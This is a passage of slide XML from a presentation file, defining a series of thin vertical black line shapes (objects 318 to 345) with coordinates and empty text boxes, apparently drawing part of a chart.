                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="1554226"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="object 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076958" y="2878428"/>
            <a:ext cx="0" cy="2853935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1440180">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1440171"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="object 319"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076685" y="2878675"/>
            <a:ext cx="2517" cy="2853935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1440180">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="1440047"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="object 320"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5104317" y="3150327"/>
            <a:ext cx="0" cy="2582131"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1303020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1302964"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="object 321"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102403" y="3148642"/>
            <a:ext cx="2517" cy="2584648"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1304289">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="1303813"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="object 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132169" y="3398588"/>
            <a:ext cx="0" cy="2334237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1177925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1177684"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="object 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131897" y="3401601"/>
            <a:ext cx="1258" cy="2331720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1176655">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="1176164"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="object 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5160075" y="3560554"/>
            <a:ext cx="0" cy="2171910"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1096010">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1095951"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="object 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159802" y="3562977"/>
            <a:ext cx="3775" cy="2169393"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="1094739">
                <a:moveTo>
                  <a:pt x="687" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="687" y="1094728"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="object 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187982" y="3710156"/>
            <a:ext cx="0" cy="2023425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1021080">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1020457"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="object 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187163" y="3712880"/>
            <a:ext cx="1258" cy="2019650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1019175">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="1019083"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="object 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5215835" y="3852262"/>
            <a:ext cx="0" cy="1881231"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="949325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="948747"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="object 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5215561" y="3853600"/>
            <a:ext cx="2517" cy="1879973"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="948689">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="948070"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="object 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243740" y="4004040"/>
            <a:ext cx="0" cy="1728971"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="872489">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="872149"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="object 331"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241826" y="4004543"/>
            <a:ext cx="2517" cy="1728971"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="872489">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="871900"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="object 332"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5271099" y="4175638"/>
            <a:ext cx="0" cy="1557836"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="786130">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="785556"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="object 333"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5270827" y="4176143"/>
            <a:ext cx="1258" cy="1556577"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="785494">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="785307"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="object 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298953" y="4244268"/>
            <a:ext cx="0" cy="1488626"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="751205">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="750929"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="object 335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296212" y="4242583"/>
            <a:ext cx="2517" cy="1489885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="751839">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="751779"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="object 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326859" y="4270532"/>
            <a:ext cx="0" cy="1462201"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="737869">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="737675"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="object 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326285" y="4271874"/>
            <a:ext cx="1258" cy="1460943"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="737235">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="736998"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="object 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5354711" y="4302709"/>
            <a:ext cx="0" cy="1430742"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="721994">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="721438"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="object 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5354437" y="4304048"/>
            <a:ext cx="2517" cy="1429484"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="721360">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="720762"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="object 340"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382616" y="4332202"/>
            <a:ext cx="0" cy="1400542"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="706755">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="706555"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="object 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5380959" y="4334925"/>
            <a:ext cx="2517" cy="1398025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="705485">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="705181"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="object 342"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410524" y="4441584"/>
            <a:ext cx="0" cy="1291066"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="651510">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="651357"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="object 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410252" y="4443214"/>
            <a:ext cx="1258" cy="1289807"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="650875">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="650535"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="object 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5437829" y="4502201"/>
            <a:ext cx="0" cy="1230665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="621030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="620763"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="object 345"/>
